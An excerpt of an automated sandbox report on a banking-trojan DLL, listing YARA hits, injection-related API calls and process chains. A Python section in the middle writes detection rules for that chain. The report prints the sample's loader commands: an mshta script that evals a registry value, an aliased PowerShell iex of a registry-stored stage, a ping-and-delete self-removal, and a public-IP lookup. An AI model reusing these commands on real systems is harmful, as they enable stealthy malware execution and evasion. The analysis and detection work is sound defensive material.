Source: powershell.exe, 00000012.00000003.416459549.000001E6362BB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000012.00000003.416780801.000001E636303000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.559953766.000001E636304000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.osofts/Microt0
Source: rundll32.exe, 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03431CA5 ResetEvent, ResetEvent, InternetReadFile, GetLastError, ResetEvent, InternetReadFile, GetLastError

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 00000002.00000003.297325888.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.297834584.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.297429352.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.297681439.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.343681335.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.297590765.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.344393693.00000000053EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.297638770.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.297792500.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.342664941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.297847872.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5132, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: control.exe PID: 4084, type: MEMORYSTR
Source: Yara match | File source: 2.3.rundll32.exe.50494a0.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.5596b40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.5596b40.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.55694a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.rundll32.exe.3430000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.50494a0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.55694a0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.54ea4a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.54ea4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.464317231.000000000526F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.343634422.0000000005569000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.461814934.0000000005049000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000000.414668534.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000000.413947295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.343553499.00000000054EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000000.415531783.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: loaddll32.exe, 00000000.00000002.254755088.000000000095B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud

Source: Yara match | File source: 00000002.00000003.297325888.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.297834584.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.297429352.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.297681439.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.343681335.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.297590765.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.344393693.00000000053EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.297638770.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.297792500.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.342664941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.297847872.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5132, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: control.exe PID: 4084, type: MEMORYSTR
Source: Yara match | File source: 2.3.rundll32.exe.50494a0.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.5596b40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.5596b40.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.55694a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.rundll32.exe.3430000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.50494a0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.55694a0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.54ea4a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.54ea4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.464317231.000000000526F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.343634422.0000000005569000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.461814934.0000000005049000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000000.414668534.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000000.413947295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.343553499.00000000054EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000000.415531783.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\explorer.exe | Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03435FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

                      System Summary

Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: xaj0e933Uv.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03434BF1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03431645
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0343829C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0347B238
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0348FF4D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034767CA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0348D7F1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0348154D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03493DB0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0347F2A9 CreateProcessAsUserA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03436D0A NtMapViewOfSection,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0343190C GetProcAddress,NtCreateSection,memset,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03434321 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034384C1 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03485312 NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03482331 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03487950 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0347710A GetProcAddress,NtCreateSection,memset,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034861AE GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0348A806 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034800DC RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03480782 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0348BE80 NtMapViewOfSection,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03486DE0 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0347C431 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034774AE NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03485220 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0348EAC5 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03483829 NtQuerySystemInformation,RtlNtStatusToDosError,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034710C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0347D77A NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0347B7D5 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034736BB NtGetContextThread,RtlNtStatusToDosError,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034764C4 memset,NtQueryInformationProcess,
Source: xaj0e933Uv.dll | Binary or memory string: OriginalFilenamemyfile.exe$ vs xaj0e933Uv.dll
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: xaj0e933Uv.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: xaj0e933Uv.dll | Virustotal: Detection: 40%
Source: xaj0e933Uv.dll | ReversingLabs: Detection: 47%
Source: xaj0e933Uv.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll"
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jqlc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jqlc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5F15.tmp" "c:\Users\user\AppData\Local\Temp\m5pod5s5\CSCDE04DA8616441A6AC3074D39CFFC1D3.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.cmdline
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F5.tmp" "c:\Users\user\AppData\Local\Temp\a1gxko15\CSCE08F5B5052974B07835021DDCFF1297.TMP"
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\xaj0e933Uv.dll
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\ADE6.bi1"
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5F15.tmp" "c:\Users\user\AppData\Local\Temp\m5pod5s5\CSCDE04DA8616441A6AC3074D39CFFC1D3.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F5.tmp" "c:\Users\user\AppData\Local\Temp\a1gxko15\CSCE08F5B5052974B07835021DDCFF1297.TMP"
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\xaj0e933Uv.dll
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
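The process chain above is what a detection engineer would key on: mshta.exe launched with an inline about:<hta:application> script that reads its next stage from the registry, powershell.exe that defines throw-away aliases for gp and iex before evaluating a value stored under HKCU:Software\AppDataLow, explorer.exe spawning cmd.exe to sleep with ping and then delete the DLL, and cmd.exe looking up the public IP through myip.opendns.com. The Python below is an added example written for this page; it is not part of the Joe Sandbox report and not code from the sample. It runs those four rules over process-creation records constructed from the command lines listed above; the (parent, image, cmdline) record layout is an assumption about the telemetry source. The alias-resolution step is the point worth noting: the PowerShell stage never contains the literal `iex (`, only `slctai (`, so a rule has to rewrite the inline new-alias definitions before looking for Invoke-Expression.

```python
"""Detection rules for the loader chain recorded in this report (added example).
Records are (parent, image, cmdline) triples; that layout is an assumption about
the telemetry source, not something the report specifies."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str
    image: str
    cmdline: str


# Built-in PowerShell aliases the stage relies on. The loader hides them behind
# throw-away names created with new-alias, so both layers must be resolved.
BUILTIN_ALIASES = {"gp": "Get-ItemProperty", "iex": "Invoke-Expression"}
ALIAS_DEF_RE = re.compile(r"new-alias\s+-name\s+(\w+)\s+-value\s+([\w-]+)\s*;?", re.I)
APPDATALOW_RE = re.compile(r"hkcu:\\?software\\appdatalow", re.I)
# "ping <host> -n N && del <file>": sleep via ping, then delete the dropper.
PING_THEN_DEL_RE = re.compile(r"ping\s+\S+\s+-n\s+(\d+).*?&&\s*del\b", re.I)


def resolve_aliases(cmdline: str) -> str:
    """Strip inline new-alias definitions and rewrite every alias (inline or
    built-in) to its cmdlet name, so 'slctai (' becomes 'Invoke-Expression ('."""
    table = dict(BUILTIN_ALIASES)

    def collect(m):
        table[m.group(1).lower()] = BUILTIN_ALIASES.get(m.group(2).lower(), m.group(2))
        return ""

    body = ALIAS_DEF_RE.sub(collect, cmdline)
    return re.sub(r"[A-Za-z_]\w*", lambda m: table.get(m.group(0).lower(), m.group(0)), body)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev: ProcEvent):
    """Return the name of the first rule the event satisfies, or None."""
    img, low = basename(ev.image), ev.cmdline.lower()
    if img == "mshta.exe" and "about:<hta:application>" in low and ".regread(" in low:
        return "mshta_inline_hta_regread"
    if img == "powershell.exe":
        norm = resolve_aliases(ev.cmdline).lower()
        if "invoke-expression" in norm and "get-itemproperty" in norm and APPDATALOW_RE.search(norm):
            return "powershell_registry_stage_iex"
    if img == "cmd.exe":
        if PING_THEN_DEL_RE.search(ev.cmdline):
            return "cmd_ping_delay_then_del"
        if "nslookup" in low and "myip.opendns.com" in low:
            return "cmd_public_ip_nslookup"
    return None


def evaluate(events):
    """(rule, parent, image) for every event that matches a rule, in input order."""
    hits = []
    for ev in events:
        rule = check_event(ev)
        if rule:
            hits.append((rule, basename(ev.parent), basename(ev.image)))
    return hits


# Constructed from the process-creation lines of the report (parents as reported).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\loaddll32.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r'''cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1'''),
    ProcEvent("unknown", r"C:\Windows\System32\mshta.exe",
              r"""C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jqlc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jqlc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>"""),
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))'''),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r'''C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\xaj0e933Uv.dll'''),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r'''cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\ADE6.bi1"'''),
]

if __name__ == "__main__":
    for rule, parent, image in evaluate(SAMPLE_EVENTS):
        print(f"{rule:32} {parent} -> {image}")
```

The first record (loaddll32.exe starting cmd.exe for rundll32.exe) is the sandbox's own harness and matches nothing; the other four each hit exactly one rule. Parent information is kept in the output because the self-delete and nslookup commands are only suspicious in combination with their explorer.exe parent, which is where the injected code runs.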
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20220504
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jkorezbb.opv.ps1
Source: classification engine | Classification label: mal100.bank.troj.evad.winDLL@25/17@0/1
Source: C:\Windows\System32\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034368BD CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,FindCloseChangeNotification,
